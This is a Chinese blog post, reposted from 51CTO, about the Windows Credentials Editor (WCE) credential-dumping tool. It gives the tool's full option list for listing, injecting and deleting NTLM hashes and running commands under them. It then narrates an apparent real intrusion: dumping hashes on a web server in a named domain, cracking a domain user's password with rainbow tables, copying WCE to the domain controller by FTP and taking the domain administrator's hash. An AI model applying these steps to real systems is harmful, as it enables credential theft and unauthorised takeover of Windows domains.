昨天G0t3n聊天,G0t3n說起Windows Credentials Editor v1.2 (WCE)這款軟體,除了抓HASH,還能注入HASH攻擊,提升為域管理者權限。
參數如下:
-l List logon sessions and NTLM credentials (default).
-s Changes NTLM credentials of current logon session.
Parameters: <UserName>:<DomainName>:<LMHash>:<NTHash>.
-r Lists logon sessions and NTLM credentials indefinitely.
Refreshes every 5 seconds if new sessions are found.
Optional: -r<refresh interval>.
-c Run <cmd> in a new session with the specified NTLM credentials.
Parameters: <cmd>.
-e Lists logon sessions NTLM credentials indefinitely.
Refreshes every time a logon event occurs.
-o saves all output to a file.
Parameters: <filename>.
-i Specify LUID instead of use current logon session.
Parameters: <luid>.
-d Delete NTLM credentials from logon session.
-v verbose output.
馬上測試一下,登陸伺服器,下載下傳WCE,然後執行指令:wce -l 列出曾經登陸過的使用者HASH
<a target="_blank" href="http://blog.51cto.com/attachment/201108/113724947.jpg"></a>
這裡說明一下,圖中每個使用者名:号和HASH:号之間的就是域或計算機名,圖裡的域名稱是:BIGTH。計算機名是:BKKWEB01,顯示的就是此台計算機名
BKKWEB01對應的使用者是本地使用者不具備域權限。BIGTH是域使用者,可以登陸域内任何主機。
獲得了域使用者的HASH,就用工具配合彩虹表破解,1分鐘左右,密碼就出來了。登陸域控主機,使用FTP把WCE軟體傳過來
<a target="_blank" href="http://blog.51cto.com/attachment/201108/113806869.jpg"></a>
然後再 WCE -l 一下,這次可把域控管理者的HASH也拿到了。
<a target="_blank" href="http://blog.51cto.com/attachment/201108/113831402.jpg"></a>
倉促寫的,錯漏請多包涵。。。
本文轉自enables 51CTO部落格,原文連結:http://blog.51cto.com/niuzu/651571,如需轉載請自行聯系原作者